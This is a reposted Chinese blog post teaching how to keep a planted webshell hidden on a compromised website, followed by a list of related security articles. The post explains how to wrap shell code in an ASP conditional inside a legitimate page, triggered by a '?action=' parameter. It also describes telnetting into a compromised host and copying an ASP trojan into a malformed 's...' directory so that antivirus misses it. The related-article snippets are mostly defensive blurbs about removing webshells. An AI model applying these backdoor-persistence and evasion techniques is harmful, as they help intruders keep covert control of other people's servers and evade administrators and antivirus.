如何更简单的留你的webshell后门

简介:
得到网站的webshell后,如果被管理员发现,那么你的马就没用了 ,被删了! 
所以我们要隐藏好我们的SHELL,管理员都也不是混饭吃的, 

1.下面教一种很菜的方法,ASP插入法,不容易被发现~ 
在我们要做手脚的ASP文件里加入如下内容 
<% if request("action")="ok" then %> 
*********************** 
<% end if %> 
  

在***********处加入你的shell代码 
就哦克了 
访问的时候在你做了手脚的ASP文件后面加上?action=shell(例如:index.asp?action=shell) 
就可以调出webshell了,不影响正常浏揽 
2.还有一种方法 
前提是得到系统权限之后, 
telnet肉肉IPPort 
成功telnet之后,传一个asp木马 
进入网站目录 
最后是在下一层吧 
md s...\ 
copy 1.asp s.../ 
OK,这样防毒软件就搞不到了 

防问时 [url]http://your[/url] 肉肉/s.../1.asp















本文转自loveme2351CTO博客,原文链接: http://blog.51cto.com/loveme23/8555,如需转载请自行联系原作者


相关文章
|
云安全 SQL 弹性计算
阿里云提示网站后门发现后门(Webshell)文件的解决办法
2018年10月27日接到新客户网站服务器被上传了webshell脚本木马后门问题的求助,对此我们sine安全公司针对此阿里云提示的安全问题进行了详细分析,ECS服务器被阿里云提示异常网络连接-可疑WebShell通信行为,还会伴有,网站后门-发现后门(Webshell)文件,以及提示网站后门-一句话webshell的安全提示,但是大部分都是单独服务器ECS的用户,具体被阿里云提示的截图如下:
3026 1
阿里云提示网站后门发现后门(Webshell)文件的解决办法
|
7月前
|
安全 数据安全/隐私保护
webshell菜刀后门分析
webshell菜刀后门分析
37 1
|
7月前
|
安全 数据安全/隐私保护
webshell后门分析
webshell后门分析
103 3
|
SQL 缓存 弹性计算
阿里云提示网站后门发现后门(Webshell)文件该怎么解决
阿里云提示网站后门发现后门(Webshell)文件该怎么解决
2640 0
阿里云提示网站后门发现后门(Webshell)文件该怎么解决
|
安全 PHP 数据安全/隐私保护
记一次webshell文件及流量免杀
记一次webshell文件及流量免杀
331 0
|
存储 安全 关系型数据库
webshell网站木马文件后门如何根据特征删除
Webshell实际上是一个能够执行恶意功能的PHP代码文件。Webshell要执行恶意功能,其代码结构主要由两部分组成:数据传递部分和数据执行部分。在webshell中,数据传递部分是指webshell中用来接收外部输入数据的部分,webshell可以根据外部输入数据动态地交互执行恶意功能。在webshell中,数据执行部分指的是webshell中的system函数,用于执行代码执行和执行命令等命令。
393 0
webshell网站木马文件后门如何根据特征删除
|
开发框架 安全 Java
网站后门木马查杀该怎么删除
收到阿里云的短信提醒说是网站存在后门,webshell恶意通信行为,紧急的安全情况,我第一时间登录阿里云查看详情,点开云盾动态感知,查看了网站木马的详细路径以及webshell的特征,网站从来没有出现过这种情况,一脸懵逼,无奈询问度娘吧,百度搜索了什么是webshell,为了解决这个问题,我可是下了很大的功夫,终于了解清楚并解决了阿里云提示网站后门的这个问题,记录一下我解决问题的过程。
376 0
网站后门木马查杀该怎么删除
|
监控 前端开发 安全
webshell内存木马的介绍与应用
内存马,也就是无文件格式webshell,检查难度系数很大,运用分布式数据库(apache、mvc这种)去运行恶意程序。适合情景为一些web应用为jar包运行,无网站文件目录、想写文件格式找不着网站文件目录相对路径等。内存马的注入一般搭配反序列化安全漏洞开展运用,如spring反序列化安全漏洞、fastjson反序列化、weblogic反序列化这种;也是有先提交着地文件格式,随后浏览注入内存马的,这类实际上 没有什么必要性,暂时性忽视。1个最实用的内存马方式便是https://ip:port/
372 0
webshell内存木马的介绍与应用
|
SQL 监控 安全
网站服务器被攻击了如何查找木马(webshell)IP 篡改的痕迹
很对客户网站以及服务器被攻击,被黑后,留下了很多webshell文件,也叫网站木马文件,客户对自己网站的安全也是很担忧,担心网站后期会继续被攻击篡改,毕竟没有专业的安全技术去负责网站的安全防护工作,通过老客户的介绍很多客户在遇到网站被攻击后找到我们SINE安全做网站的安全服务,防止恶意攻击与篡改。对网站进行全面的防御与加固,我们在对客户网站进行安全部署的同时,客户经常会想要了解到底网站,以及服务器是如何被入侵,攻击者的IP是谁,那么我们SINESAFE技术针对这种情况,最好的办法就是通过日志进行分析,溯源追踪,帮助客户找到网站漏洞根源,到底是谁在攻击他们。下面我们来分享一下,我们是如何对日志进
652 0
网站服务器被攻击了如何查找木马(webshell)IP 篡改的痕迹
|
SQL 安全 数据安全/隐私保护
阿里云发现后门webshell文件 该如何解决处理
昨晚凌晨收到新客户的安全求助,说是阿里云短信提示,网站有webshell木马文件被植入,我们SINE安全公司立即成立,安全应急响应小组,客户提供了阿里云的账号密码,随即登陆阿里云进去查看到详情,登陆云盾看到有这样的一个安全提示“网站后门-发现后门(Webshell)文件”事件等级:紧急,影响资产:阿里云ECS:ID,然后贴出了网站木马文件的路径地址:/www/wangzhan/safe/indnx.php。
21222 0